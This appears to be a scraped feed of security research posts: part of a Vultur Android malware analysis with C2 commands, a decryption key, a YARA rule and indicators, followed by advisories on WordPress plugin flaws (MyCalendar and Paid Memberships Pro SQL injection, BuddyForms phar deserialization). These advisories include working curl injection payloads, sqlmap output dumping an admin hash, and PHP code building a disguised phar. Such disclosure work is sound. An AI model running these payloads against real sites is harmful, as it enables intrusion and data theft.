Layer 2: Vultur descends

The second Vultur APK contains more important functionality, such as AlphaVNC and ngrok setup, displaying of custom HTML code in WebViews, screen recording, and more. Just like the previous versions of Vultur, the latest edition still includes the ability to remotely access the infected device through AlphaVNC and ngrok.

This second Vultur payload also uses the (Android Accessibility Suite) package name for the malicious Accessibility Service. From here, there are multiple references to methods invoked from another file: the final Vultur payload. This time, the payload is not decrypted from native code. In this sample, an encrypted file named is decrypted using AES/CFB/NoPadding with the decryption key SBhXcwoAiLTNIyLK (stored in SharedPreference key dffa98fe-8bf6-4ed7-8d80-bb1a83c91fbb). We have observed the same decryption key being used in multiple samples for decrypting payload #3.

Figure 13: Decryption of the third Vultur payload.

Furthermore, from payload #2 onwards, Vultur uses encrypted SharedPreferences for further hiding of malicious configuration related key-value pairs.

Layer 3: Vultur strikes

The final payload is a Dalvik Executable (DEX) file. This decrypted DEX file holds Vultur’s core functionality. It contains the references to all of the C2 methods (used in communication from bot to C2 server, in order to send or retrieve information) and FCM commands (used in communication from C2 server to bot, in order to perform actions on the infected device).

An important observation here, is that code defined in payload #3 can be invoked from payload #2 and vice versa. This means that these final two files effectively work together.

Figure 14: Decompiled code snippet showing some of the FCM commands implemented in Vultur payload #3.

The last Vultur payload does not contain its own Accessibility Service, but it can interact with the Accessibility Service that is implemented in payload #2.

C2 Communication: Vultur finds its voice

When Vultur infects a device, it initiates a series of communications with its designated C2 server. Communications related to C2 methods such as application.register and vnc.blocked.packages occur using JSON-RPC 2.0 over HTTPS. These requests are sent from the infected device to the C2 server to either provide or receive information.

Actual vultures lack a voice box; their vocalisations include rasping hisses and grunts [4]. While the communication in older variants of Vultur may have sounded somewhat similar to that, you could say that the threat actors have developed a voice box for the latest version of Vultur. The content of the aforementioned requests are now AES encrypted and Base64 encoded, just like the server response.

Next to encrypted communication over HTTPS, the bot can receive commands via Firebase Cloud Messaging (FCM). FCM is a cross-platform messaging solution provided by Google. The FCM related commands are sent from the C2 server to the infected device to perform actions on it.

During our investigation of the latest Vultur variant, we identified the C2 endpoints mentioned below.

/ejr/Endpoint for C2 communication using JSON-RPC 2.0.
Note: in older versions of Vultur the /rpc/ endpoint was used for similar communication.
/upload/Endpoint for uploading files (such as screen recording results).
/version/app/?filename=ngrok arch={DEVICE_ARCH}Endpoint for downloading the relevant version of ngrok.
/version/app/?filename={FILENAME}Endpoint for downloading a file specified by the payload (related to the new file manager functionality).

C2 methods in Brunhilda dropper

The commands below are sent from the infected device to the C2 server to either provide or receive information.

application.registerRegisters the bot by providing the malware package name and information about the device: model, country, installed apps, Android version. It also sends a tag that is used for identifying the dropper campaign name.
Note: this method is also used once in Vultur payload #1, but without sending a tag. This method then returns a token to be used in further communication with the C2 server.
application.stateSends a token value that was set as a response to the application.register command, together with a status code of “3”.

C2 methods in Vultur

The commands below are sent from the infected device to the C2 server to either provide or receive information.

vnc.register (UPDATED)Registers the bot by providing the FCM token, malware package name and information about the device, model, country, Android version. This method has been updated in the latest version of Vultur to also include information on whether the infected device is rooted and if it is detected as an emulator.
vnc.status (UPDATED)Sends the following status information about the device: if the Accessibility Service is enabled, if the Device Admin permissions are enabled, if the screen is locked, what the VNC address is. This method has been updated in the latest version of Vultur to also send information related to: active fingerprints on the device, screen resolution, time, battery percentage, network operator, location.
vnc.appsSends the list of apps that are installed on the victim’s device.
vnc.keylogSends the keystrokes that were obtained via keylogging.
vnc.config (UPDATED)Obtains the config of the malware, such as the list of targeted applications by the keylogger and VNC. This method has been updated in the latest version of Vultur to also obtain values related to the following new keys: “packages2”, “rurl”, “recording”, “main_content”, “tvmq”.
vnc.overlayObtains the HTML code for overlay injections of a specified package name using the pkg parameter. It is still unclear whether support for overlay injections is fully implemented in Vultur.
vnc.overlay.logsSends the stolen credentials that were obtained via HTML overlay injections. It is still unclear whether support for overlay injections is fully implemented in Vultur.
vnc.pattern (NEW)Informs the C2 server whether a PIN pattern was successfully extracted and stored in the application’s Shared Preferences.
vnc.snapshot (NEW)Sends JSON data to the C2 server, which can contain:

1. Information about the accessibility event’s class, bounds, child nodes, UUID, event type, package name, text content, screen dimensions, time of the event, and if the screen is locked.
2. Recently copied text, and SharedPreferences values related to “overlay” and “keyboard”.
3. X and Y coordinates related to a click.
vnc.submit (NEW)Informs the C2 server whether the bot registration was successfully submitted or if it failed.
vnc.urls (NEW)Informs the C2 server about the URL bar related element IDs of either the Google Chrome or Firefox webbrowser (depending on which application triggered the accessibility event).
vnc.blocked.packages (NEW)Retrieves a list of “blocked packages” from the C2 server and stores them together with custom HTML code in the application’s Shared Preferences. When one of these package names is detected as running on the victim device, the malware will automatically press the back button and display custom HTML content if available. If unavailable, a default “Temporarily Unavailable” message is displayed. (NEW)Sends file related information to the C2 server. File manager functionality includes downloading, uploading, installing, deleting, and finding of files.
vnc.syslogSends logs.
crash.logsSends logs of all content on the screen.
installer.config (NEW)Retrieves the HTML code that is displayed in a WebView of the first Vultur payload. This HTML code contains instructions to enable Accessibility Services permissions.

FCM commands in Vultur

The commands below are sent from the C2 server to the infected device via Firebase Cloud Messaging in order to perform actions on the infected device. The new commands use IDs instead of names that describe their functionality. These command IDs are the same in different samples.

registeredReceived when the bot has been successfully registered.
startStarts the VNC connection using ngrok.
stopStops the VNC connection by killing the ngrok process and stopping the VNC service.
unlockUnlocks the screen.
deleteUninstalls the malware package.
patternProvides a gesture/stroke pattern to interact with the device’s screen.
109b0e16 (NEW)Presses the back button.
18cb31d4 (NEW)Presses the home button.
811c5170 (NEW)Shows the overview of recently opened apps.
d6f665bf (NEW)Starts an app specified by the payload.
1b05d6ee (NEW)Shows a black view.
1b05d6da (NEW)Shows a black view that is obtained from the layout resources in Vultur payload #2.
7f289af9 (NEW)Shows a WebView with HTML code loaded from SharedPreference key “946b7e8e”.
dc55afc8 (NEW)Removes the active black view / WebView that was added from previous commands (after sleeping for 15 seconds).
cbd534b9 (NEW)Removes the active black view / WebView that was added from previous commands (without sleeping).
4bacb3d6 (NEW)Deletes an app specified by the payload.
b9f92adb (NEW)Navigates to the settings of an app specified by the payload.
77b58a53 (NEW)Ensures that the device stays on by acquiring a wake lock, disables keyguard, sleeps for 0,1 second, and then swipes up to unlock the device without requiring a PIN.
ed346347 (NEW)Performs a click.
5c900684 (NEW)Scrolls forward.
d98179a8 (NEW)Scrolls backward.
7994ceca (NEW)Sets the text of a specified element ID to the payload text.
feba1943 (NEW)Swipes up.
d403ad43 (NEW)Swipes down.
4510a904 (NEW)Swipes left.
753c4fa0 (NEW)Swipes right.
b183a400 (NEW)Performs a stroke pattern on an element across a 3×3 grid.
81d9d725 (NEW)Performs a stroke pattern based on x+y coordinates and time duration.
b79c4b56 (NEW)Press-and-hold 3 times near bottom middle of the screen.
1a7493e7 (NEW)Starts capturing (recording) the screen.
6fa8a395 (NEW)Sets the “ShowMode” of the keyboard to 0. This allows the system to control when the soft keyboard is displayed.
9b22cbb1 (NEW)Sets the “ShowMode” of the keyboard to 1. This means the soft keyboard will never be displayed (until it is turned back on).
98c97da9 (NEW)Requests permissions for reading and writing external storage.
7b230a3b (NEW)Request permissions to install apps from unknown sources.
cc8397d4 (NEW)Opens the long-press power menu.
3263f7d4 (NEW)Sets a SharedPreference value for the key “c0ee5ba1-83dd-49c8-8212-4cfd79e479c0” to the specified payload. This value is later checked for in other to determine whether the long-press power menu should be displayed (SharedPref value 1), or whether the back button must be pressed (SharedPref value 2).
request_accessibility (UPDATED)Prompts the infected device with either a notification or a custom WebView that instructs the user to enable accessibility services for the malicious app. The related WebView component was not present in older versions of Vultur.
announcement (NEW)Updates the value for the C2 domain in the SharedPreferences.
5283d36d-e3aa-45ed-a6fb-2abacf43d29c (NEW)Sends a POST with the vnc.config C2 method and stores the malware config in SharedPreferences.
09defc05-701a-4aa3-bdd2-e74684a61624 (NEW)Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2, and displays a black view.
fc7a0ee7-6604-495d-ba6c-f9c2b55de688 (NEW)Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2, and displays a custom WebView with HTML code loaded from SharedPreference key “946b7e8e” (“tvmq” value from malware config).
8eac269d-2e7e-4f0d-b9ab-6559d401308d (NEW)Hides / disables the keyboard, obtains a wake lock, disables keyguard (lock screen security), mutes the audio, stops the “TransparentActivity” from payload #2.
e7289335-7b80-4d83-863a-5b881fd0543d (NEW)Enables the keyboard and unmutes audio. Then, sends the vnc.snapshot method with empty JSON data.
544a9f82-c267-44f8-bff5-0726068f349d (NEW)Retrieves the C2 command, payload and UUID, and executes the command in a thread.
a7bfcfaf-de77-4f88-8bc8-da634dfb1d5a (NEW)Creates a custom notification to be shown in the status bar.
444c0a8a-6041-4264-959b-1a97d6a92b86 (NEW)Retrieves the list of apps to block and corresponding HTML code through the vnc.blocked.packages C2 method and stores them in the blocked_package_template SharedPreference key.
a1f2e3c6-9cf8-4a7e-b1e0-2c5a342f92d6 (NEW)Executes a file manager related command. Commands are:

1. 91b4a535-1a78-4655-90d1-a3dcb0f6388a – Downloads a file
2. cf2f3a6e-31fc-4479-bb70-78ceeec0a9f8 – Uploads a file
3. 1ce26f13-fba4-48b6-be24-ddc683910da3 – Deletes a file
4. 952c83bd-5dfb-44f6-a034-167901990824 – Installs a file
5. 787e662d-cb6a-4e64-a76a-ccaf29b9d7ac – Finds files containing a specified pattern


Writing YARA rules to detect Android malware can be challenging, as APK files are ZIP archives. This means that extracting all of the information about the Android application would involve decompressing the ZIP, parsing the XML, and so on. Thus, most analysts build YARA rules for the DEX file. However, DEX files, such as Vultur payload #3, are less frequently submitted to VirusTotal as they are uncovered at a later stage in the infection chain. To maximise our sample pool, we decided to develop a YARA rule for the Brunhilda dropper. We discovered some unique hex patterns in the dropper APK, which allowed us to create the YARA rule below.

rule brunhilda_dropper
author = "Fox-IT, part of NCC Group"
description = "Detects unique hex patterns observed in Brunhilda dropper samples."
target_entity = "file"
$zip_head = "PK"
$manifest = "AndroidManifest.xml"
$hex1 = {63 59 5c 28 4b 5f}
$hex2 = {32 4a 66 48 66 76 64 6f 49 36}
$hex3 = {63 59 5c 28 4b 5f}
$hex4 = {30 34 7b 24 24 4b}
$hex5 = {22 69 4f 5a 6f 3a}
$zip_head at 0 and $manifest and #manifest >= 2 and 2 of ($hex*)


Vultur’s recent developments have shown a shift in focus towards maximising remote control over infected devices. With the capability to issue commands for scrolling, swipe gestures, clicks, volume control, blocking apps from running, and even incorporating file manager functionality, it is clear that the primary objective is to gain total control over compromised devices.

Vultur has a strong correlation to Brunhilda, with its C2 communication and payload decryption having the same implementation in the latest variants. This indicates that both the dropper and Vultur are being developed by the same threat actors, as has also been uncovered in the past.

Furthermore, masquerading malicious activity through the modification of legitimate applications, encryption of traffic, and the distribution of functions across multiple payloads decrypted from native code, shows that the actors put more effort into evading detection and complicating analysis.

During our investigation of recently submitted Vultur samples, we observed the addition of new functionality occurring shortly after one another. This suggests ongoing and active development to enhance the malware’s capabilities. In light of these observations, we expect more functionality being added to Vultur in the near future.

Indicators of Compromise

Analysed samples

Package nameFile hash (SHA-256)Description
com.wsandroid.suiteedef007f1ca60fdf75a7d5c5ffe09f1fc3fb560153633ec18c5ddb46cc75ea21Brunhilda Dropper
com.medical.balance89625cf2caed9028b41121c4589d9e35fa7981a2381aa293d4979b36cf5c8ff2Vultur payload #1
com.medical.balance1fc81b03703d64339d1417a079720bf0480fece3d017c303d88d18c70c7aabc3Vultur payload #2
com.medical.balance4fed4a42aadea8b3e937856318f9fbd056e2f46c19a6316df0660921dd5ba6c5Vultur payload #3
com.wsandroid.suite001fd4af41df8883957c515703e9b6b08e36fde3fd1d127b283ee75a32d575fcBrunhilda Dropper
se.accessibility.appfc8c69bddd40a24d6d28fbf0c0d43a1a57067b19e6c3cc07e2664ef4879c221bVultur payload #1
se.accessibility.app7337a79d832a57531b20b09c2fc17b4257a6d4e93fcaeb961eb7c6a95b071a06Vultur payload #2
se.accessibility.app7f1a344d8141e75c69a3c5cf61197f1d4b5038053fd777a68589ecdb29168e0cVultur payload #3
com.wsandroid.suite26f9e19c2a82d2ed4d940c2ec535ff2aba8583ae3867502899a7790fe3628400Brunhilda Dropper
com.exvpn.fastvpn2a97ed20f1ae2ea5ef2b162d61279b2f9b68eba7cf27920e2a82a115fd68e31fVultur payload #1
com.exvpn.fastvpnc0f3cb3d837d39aa3abccada0b4ecdb840621a8539519c104b27e2a646d7d50dVultur payload #2
com.wsandroid.suite92af567452ecd02e48a2ebc762a318ce526ab28e192e89407cac9df3c317e78dBrunhilda Dropper
jk.powder.tendencefa6111216966a98561a2af9e4ac97db036bcd551635be5b230995faad40b7607Vultur payload #1
jk.powder.tendencedc4f24f07d99e4e34d1f50de0535f88ea52cc62bfb520452bdd730b94d6d8c0eVultur payload #2
jk.powder.tendence627529bb010b98511cfa1ad1aaa08760b158f4733e2bbccfd54050838c7b7fa3Vultur payload #3
com.wsandroid.suitef5ce27a49eaf59292f11af07851383e7d721a4d60019f3aceb8ca914259056afBrunhilda Dropper
se.talkback.app5d86c9afd1d33e4affa9ba61225aded26ecaeb01755eeb861bb4db9bbb39191cVultur payload #1
se.talkback.app5724589c46f3e469dc9f048e1e2601b8d7d1bafcc54e3d9460bc0adeeada022dVultur payload #2
se.talkback.app7f1a344d8141e75c69a3c5cf61197f1d4b5038053fd777a68589ecdb29168e0cVultur payload #3
com.wsandroid.suitefd3b36455e58ba3531e8cce0326cce782723cc5d1cc0998b775e07e6c2622160Brunhilda Dropper
com.adajio.storm819044d01e8726a47fc5970efc80ceddea0ac9bf7c1c5d08b293f0ae571369a9Vultur payload #1
com.adajio.storm0f2f8adce0f1e1971cba5851e383846b68e5504679d916d7dad10133cc965851Vultur payload #2
com.adajio.stormfb1e68ee3509993d0fe767b0372752d2fec8f5b0bf03d5c10a30b042a830ae1aVultur payload #3
com.protectionguard.appd3dc4e22611ed20d700b6dd292ffddbc595c42453f18879f2ae4693a4d4d925aBrunhilda Dropper (old variant)
com.appsmastersafeyf4d7e9ec4eda034c29b8d73d479084658858f56e67909c2ffedf9223d7ca9bd2Vultur (old variant)
com.datasafeaccountsanddata.club7ca6989ccfb0ad0571aef7b263125410a5037976f41e17ee7c022097f827bd74Vultur (old variant) (old variant)

Note: Vultur payloads #1 and #2 related to Brunhilda dropper 26f9e19c2a82d2ed4d940c2ec535ff2aba8583ae3867502899a7790fe3628400 are the same as Vultur payloads #2 and #3 in the latest variants. The dropper in this case only drops two payloads, where the latest versions deploy a total of three payloads.

C2 servers

  • safetyfactor[.]online
  • cloudmiracle[.]store
  • flandria171[.]appspot[.]com (FCM)
  • newyan-1e09d[.]appspot[.]com (FCM)

Dropper distribution URLs

  • mcafee[.]960232[.]com
  • mcafee[.]353934[.]com
  • mcafee[.]908713[.]com
  • mcafee[.]784503[.]com
  • mcafee[.]053105[.]com
  • mcafee[.]092877[.]com
  • mcafee[.]582630[.]com
  • mcafee[.]581574[.]com
  • mcafee[.]582342[.]com
  • mcafee[.]593942[.]com
  • mcafee[.]930204[.]com


  1. ↩︎
  2. ↩︎
  3. ↩︎
  4. ↩︎

WordPress MyCalendar Plugin — Unauthenticated SQL Injection(CVE-2023–6360)

2 January 2024 at 19:58

WordPress MyCalendar Plugin — Unauthenticated SQL Injection(CVE-2023–6360)

WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.

In this article, we will analyze an unauthenticated sql injection vulnerability found in the MyCalendar plugin.

This was discovered by Tenable Research while working on web application security.

Tenable TRA :
Affected Versions: < 3.4.22
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVSSv3 Score: 8.6

My Calendar does WordPress event management with richly customizable ways to display events. The plugin supports individual event calendars within WordPress Multisite, multiple calendars displayed by categories, locations or author, or simple lists of upcoming events.

Vulnerable Code:

The vulnerability is present in the function my_calendar_get_events() of ./my-calendar-events.php file which is called when a request is made to the function my_calendar_rest_route() of ./my-calendar-api.php file.

Here is the interesting code part, it is quite huge so I just have to keep the interesting part for the article :

// ./my-calendar-events.php
function my_calendar_rest_route( WP_REST_Request $request ) {
$parameters = $request->get_params();
$from = sanitize_text_field( $parameters['from'] );
$to = sanitize_text_field( $parameters['to'] );

$events = my_calendar_events( $args );

return $events;

function my_calendar_events( $args ) {
$events = my_calendar_get_events( $args );


// ./my-calendar-api.php
function my_calendar_get_events( $args ) {
$from = isset( $args['from'] ) ? $args['from'] : '';
$to = isset( $args['to'] ) ? $args['to'] : '';


$from = mc_checkdate( $from );
$to = mc_checkdate( $to );
if ( ! $from || ! $to ) {
return array();

WHERE $select_published $select_category $select_location $select_author $select_host $select_access $search
AND ( DATE(occur_begin) BETWEEN '$from 00:00:00' AND '$to 23:59:59'
OR DATE(occur_end) BETWEEN '$from 00:00:00' AND '$to 23:59:59'
OR ( DATE('$from')
[ ...]

return apply_filters( 'mc_filter_events', $arr_events, $args, 'my_calendar_get_events' );

When we look at the function in its entirety, the first thing that catches our eye is to see that raw SQL queries without the use of wpdb->prepare() are executed with variables such as from & to which correspond to user inputs.

Looking at the code, can see that mc_checkdate() is called on from & to and if the result is not valid for both, a return is made before executing the SQL query.

Let’s take a closer look at this function :

function mc_checkdate( $date ) {
$time = strtotime( $date ); # <= Is a bool(false). The error is actually here, this is what allows the payload to pass
$m = mc_date( 'n', $time ); # <= eq to 11
$d = mc_date( 'j', $time ); # <= eq to 23 (current day number)
$y = mc_date( 'Y', $time ); # <= eq to 2023

// checkdate is a PHP core function that check the validity of the date
return checkdate( $m, $d, $y ); # <= So this one eq 1

function mc_date( $format, $timestamp = false, $offset = true ) {
if ( ! $timestamp ) {
$timestamp = time();
if ( $offset ) {
$offset = intval( get_option( 'gmt_offset', 0 ) ) * 60 * 60; # <= No importance for the test, we can leave it at 0
} else {
$offset = 0;
$timestamp = $timestamp + $offset;

# So in the end returns the value of gmdate( $format, $timestamp );
return ( '' === $format ) ? $timestamp : gmdate( $format, $timestamp );

For simplicity, we can take the vulnerable code locally to observe a more detailed behavior :

This simple error therefore allows our SQL payload to bypass this check and be inserted into the SQL query.

Proof of Concept:

time curl "https://WORDPRESS_INSTANCE/?rest_route=/my-calendar/v1/events&from=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)+AND+'a'%3d'a"
real 0m3.068s
user 0m0.006s
sys 0m0.009s


sqlmap -u "*" --current-db --dbms=MySQL
___ ___[']_____ ___ ___ {1.7.9#pip}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:48:00 /2023-12-21/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]

[09:48:02] [INFO] testing connection to the target URL
[09:48:08] [INFO] URI parameter '#1*' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable (with --string="to")
[09:48:08] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:48:38] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:48:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[09:48:54] [INFO] fetching current database
[09:48:54] [INFO] retrieved: 'wasvwa'
current database: 'wasvwa'

Patch :

For backwards compatibility reasons, the author of the plugin decided to modify the mc_checkdate() function rather than using wpdb->prepare()

function mc_checkdate( $date ) {
$time = strtotime( $date );
$m = mc_date( 'n', $time );
$d = mc_date( 'j', $time );
$y = mc_date( 'Y', $time );

$check = checkdate( $m, $d, $y );
if ( $check ) {
return mc_date( 'Y-m-d', $time, false );

return false;

Adding this additional check is sufficient to correct the vulnerability.

WordPress MyCalendar Plugin — Unauthenticated SQL Injection(CVE-2023–6360) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

WordPress BuddyForms Plugin — Unauthenticated Insecure Deserialization (CVE-2023–26326)

WordPress BuddyForms Plugin — Unauthenticated Insecure Deserialization (CVE-2023–26326)

WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.

In this article, we will analyze an unauthenticated insecure deserialization vulnerability found in the in the BuddyForm plugin.

Affected Versions: < 2.7.8
CVSSv3 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Score: 8.1

BuddyForms is a simple drag and drop form builder with ready to use form templates that give you all the form types with on click.

In the vulnerable versions, the problem lies in the ‘buddyforms_upload_image_from_url()’ function of the ‘./includes/functions.php’ file

function buddyforms_upload_image_from_url() {
$url = isset( $_REQUEST['url'] ) ? wp_kses_post( wp_unslash( $_REQUEST['url'] ) ) : '';
$file_id = isset( $_REQUEST['id'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['id'] ) ) : '';
$accepted_files = isset( $_REQUEST['accepted_files'] ) ? explode( ',', buddyforms_sanitize( '', wp_unslash( $_REQUEST['accepted_files'] ) ) ) : array( 'jpeg' );

if ( ! empty( $url ) && ! empty( $file_id ) ) {
$upload_dir = wp_upload_dir();
$image_url = urldecode( $url );
$image_data = file_get_contents( $image_url ); // Get image data
$image_data_information = getimagesize( $image_url );
$image_mime_information = $image_data_information['mime'];

if ( ! in_array( $image_mime_information, $accepted_files ) ) {
echo wp_json_encode(
'status' => 'FAILED',
'response' => __(
'File type ' . $image_mime_information . ' is not allowed.',

if ( $image_data && $image_data_information ) {
$file_name = $file_id . '.png';
$full_path = wp_normalize_path( $upload_dir['path'] . DIRECTORY_SEPARATOR . $file_name );
$upload_file = wp_upload_bits( $file_name, null, $image_data );
if ( ! $upload_file['error'] ) {
$wp_filetype = wp_check_filetype( $file_name, null );
$attachment = array(
'post_mime_type' => $wp_filetype['type'],
'post_title' => preg_replace( '/\.[^.]+$/', '', $file_name ),
'post_content' => '',
'post_status' => 'inherit',
$attachment_id = wp_insert_attachment( $attachment, $upload_file['file'] );
$url = wp_get_attachment_thumb_url( $attachment_id );
echo wp_json_encode(
'status' => 'OK',
'response' => $url,
'attachment_id' => $attachment_id,


This function has several problems that allow to perform an insecure deserialization in several steps.

  1. The ‘url’ parameter’ accept an arbitrary value, no verification is done
  2. The ‘accepted_files’ parameter can be added to the request to specify an arbitrary mime type which allows to bypass the mime verification type
  3. The PHP function ‘getimagesize()’ is used, this function does not check the file and therefore assumes that it is an image that is passed to it. However, if a non-image file is supplied, it may be incorrectly detected as an image and the function will successfully return
  4. The PHP function ‘file_get_contents()’ is used without any prior check. This function allows the use of the ‘phar://’ wrapper. The Phar (PHP Archive) files contain metadata in serialized format, so when they are parsed, this metadata is deserialized.

If all conditions are met, the file is downloaded and stored on the server and the URL of the image is returned to the user.

The exploitation of this vulnerability is based on 3 steps

  1. Create a malicious phar file by making it look like an image.
  2. Send the malicious phar file on the server
  3. Call the file with the ‘phar://’ wrapper.

The main difficulty in exploiting this vulnerability is to find a gadget chain. There are several known gadgets chain for WordPress but they are no longer valid on the latest versions.

The plugin itself does not seem to contain any gadget chain either. So, in order to trigger the vulnerability we will simulate the presence of a plugin allowing the exploitation.

So we can add a fake WordPress extension named “dummy”, which contains only a file “dummy.php” with the following code :

Plugin Name: Dummy

class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");

function display_hello_world() {
echo "Hello World";

add_action('wp_footer', 'display_hello_world');

Proof Of Concept

The first step of our exploitation is to create our malicious phar archive which will have to pretend to be an image :


class Evil{
public function __wakeup() : void {
die("Arbitrary Deserialization");

//create new Phar
$phar = new Phar('evil.phar');
$phar->addFromString('test.txt', 'text');
$phar->setStub("GIF89a\n<?php __HALT_COMPILER(); ?>");

// add object of any class as meta data
$object = new Evil();

Note the presence of ‘GIF89a’ which will make the plugin believe that our file is a GIF image

root@vmi652687:/tmp# php --define phar.readonly=0 evil.php
root@vmi652687:/tmp# strings evil.phar
<?php __HALT_COMPILER(); ?>

So as a reminder, our WordPress installation has two plugins, BuddyForms as well as our ‘dummy’ plugin which simulates a vulnerable plugin allowing a gadget chain

We send our file to the server via a POST request containing the correct parameters expected by the function described above

The server answers OK and tells us that the file is available at the URL http://domain.tld/wp-content/uploads/2023/02/1.png which can be checked by opening the corresponding folder in your browser

So we just have to do the same action again, except that this time we will use the phar:// wrapper in the URL and indicate the path of our file.

By chance, the structure of wordpress folders is always the same, you just have to go up one folder to access wp-content. So, it is possible to use the relative path to our file stored on the server

And voila, we managed to trigger an arbitrary deserialization

As sometimes a picture is worth a thousand words, here is a diagram that summarizes the explanation

The fix

In version 2.7.8, the author has made a simple fix, just check if the ‘phar://’ wrapper is used

if ( strpos( $valid_url, 'phar://' ) !== false ) {

In my opinion, this correction seems insufficient because the downloaded file is still not verified, it would still be possible to exploit the vulnerability if another plugin allows to call an arbitrary file.

[EDIT] : Jesús Calderón identified a bypass for this fix. The check added, does not check that the value of ‘$valid_url’ is decoded
So, is possible to use the following payload :


WordPress BuddyForms Plugin — Unauthenticated Insecure Deserialization (CVE-2023–26326) was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Multiples WordPress plugins CVE analysis

24 January 2023 at 20:09

WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.

In this article, we will analyze several vulnerabilities found in different WordPress plugins :

CVE-2023–23488 : Paid Memberships Pro < 2.9.8 — Unauthenticated SQL Injection

Affected Versions: < 2.9.8
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Score: 9.8

Paid Memberships Pro gives you all the tools you need to start, manage, and grow your membership site. The plugin is designed for premium content sites, online course or LMS and training-based memberships, clubs and associations, members-only product discount sites, subscription box products, paid newsletters, and more.

The plugin does not escape the ‘code’ parameter in one of its REST route (available to unauthenticated users) before using it in a SQL statement, leading to a SQL injection.

Vulnerable Code:

This vulnerability is present in the ‘./classes/class.memberorder.php’

Returns the order using the given order code.
function getMemberOrderByCode($code)
global $wpdb;
$id = $wpdb->get_var("SELECT id FROM $wpdb->pmpro_membership_orders WHERE code = '" . $code . "' LIMIT 1");
return $this->getMemberOrderByID($id);
return false;

The ‘$code’ parameter is inserted into the SQL query without cleaning it first or using “$wpdb->prepare” which permit to prepares a SQL query for safe execution.

Proof of Concept:

time curl "http://TARGET_HOST/?rest_route=/pmpro/v1/order&code=a%27%20OR%20(SELECT%201%20FROM%20(SELECT(SLEEP(1)))a)--%20-"
real 0m3.068s
user 0m0.006s
sys 0m0.009s


# sqlmap -u "*" --dbms=MySQL -dump -T wp_users

Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:' AND (SELECT 2555 FROM (SELECT(SLEEP(5)))BnSC) AND 'SsRo'='SsRo
[15:23:35] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[15:23:51] [INFO] confirming MySQL
[15:23:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[15:24:21] [INFO] adjusting time delay to 1 second due to good response times
[15:24:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 20.10 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[15:24:21] [INFO] fetching columns for table 'wp_users' in database 'wasvwa'
[15:36:26] [INFO] retrieved: admin
[15:37:09] [INFO] retrieved:
[15:37:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:37:09] [INFO] retrieved: [email protected]
[15:39:06] [INFO] retrieved: admin
[15:39:49] [INFO] retrieved: admin
[15:40:32] [INFO] retrieved: $P$BPEJq1QWmIm.EEKtbgj/ogVzxGPV4I/

CVE-2023–23489 : Easy Digital Downloads & — Unauthenticated SQL Injection

Affected Versions: &
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Score: 9.8

Easy Digital Downloads is a complete eCommerce solution for selling digital products on WordPress.

The plugin does not escape the ‘s’ parameter in one of its ajax actions before using it in a SQL statement, leading to a SQL injection.

Vulnerable Code:

The vulnerable part of the code corresponds to the ‘edd_ajax_download_search()’ function of the ‘./includes/ajax-functions.php’ file

function edd_ajax_download_search() {
// We store the last search in a transient for 30 seconds. This _might_
// result in a race condition if 2 users are looking at the exact same time,
// but we'll worry about that later if that situation ever happens.
$args = get_transient( 'edd_download_search' );

// Parse args
$search = wp_parse_args( (array) $args, array(
'text' => '',
'results' => array()
) );

// Get the search string
$new_search = isset( $_GET['s'] )
? sanitize_text_field( $_GET['s'] )
: '';

// Default query arguments
$args = array(
'orderby' => 'title',
'order' => 'ASC',
'post_type' => 'download',
'posts_per_page' => 50,
'post_status' => implode( ',', $status ), // String
'post__not_in' => $excludes, // Array
'edd_search' => $new_search, // String
'suppress_filters' => false,

// Get downloads
$items = get_posts( $args );


Contrary to what one might think, the use of ‘sanitize_text_field()’ does not protect against SQL injections, this core function is in charge of

  • Checks for invalid UTF-8
